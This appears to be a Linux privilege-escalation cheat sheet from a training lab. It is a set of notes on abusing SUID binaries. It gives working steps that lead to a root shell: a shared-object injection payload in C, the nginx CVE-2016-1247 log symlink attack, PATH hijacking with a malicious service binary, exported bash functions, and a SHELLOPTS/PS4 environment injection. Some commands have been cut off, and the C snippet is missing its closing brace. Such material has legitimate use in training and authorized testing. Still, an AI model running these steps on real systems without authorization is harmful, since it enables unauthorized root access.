• find / -perm -u=s -type f 2>/dev/null will list all the files with the suid perm


  • Here again we can use GTFOBins and check if our command is in there and has documented exploitation


SUID - Shared Object Injection


  • find / -type f -perm -04000 -ls 2>/dev/null

  • ls -al nameoffile


  • In our example the file is /usr/local/bin/suid-so

  • strace /usr/local/bin/suid-so 2>&1 with a grep on what could be interesting strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file" this will show us what happens with the file. This is the place to check if we have rights on one of the file it uses. In our example we will use the file in this output open("/home/user/.config/", O_RDONLY) = -1 ENOENT (No such file or directory)

  • Once we find a file we can try to overwrite it with a payload to elevate our privileges

#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() { 
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
  • We make a directory for our file

  • We compile our file gcc -shared -fPIC -o /home/user/.config/ /home/user/libcalc.c in my example the file I will overright is /home/user/.config/

  • This way we just need to run the sid file which is /usr/local/bin/suid-so in our example

  • Issues on log created by nginx


  • ./ we should have this output [+] [CVE-2016-1247] or we could manually look for this specific vulnerability by checking nginx version dpkg -l | grep nginx

  • Now we need to check if the suid bit is set on sudo find / -type f -perm -04000 -ls 2>/dev/null or ls -al /usr/bin/sudo


  • ls -al /var/log/nginx

  • We will need to create a malicious symlink

  • We will use this to do so

  • ./ /var/log/nginx/error.log

  • Check out this resource to learn more about this way to escalate

SUID - Environmental Variables



  • Let's create a malicious service and add it to our path so that it is launched instead of apache

  • echo 'int main() {setgid(0); setuid(0); system("/bin/bash"); return 0;}' > /tmp/service.c

  • gcc /tmp/service.c -o /tmp/service

SUID - Environmental Variables with full path to binary

  • function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; } instead of creating a malicious bin we create a malicious function

  • export -f /usr/sbin/service then we export our function in the path

  • /usr/local/bin/suid-env2 finally we just need to launch the service OR

  • env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'

Last updated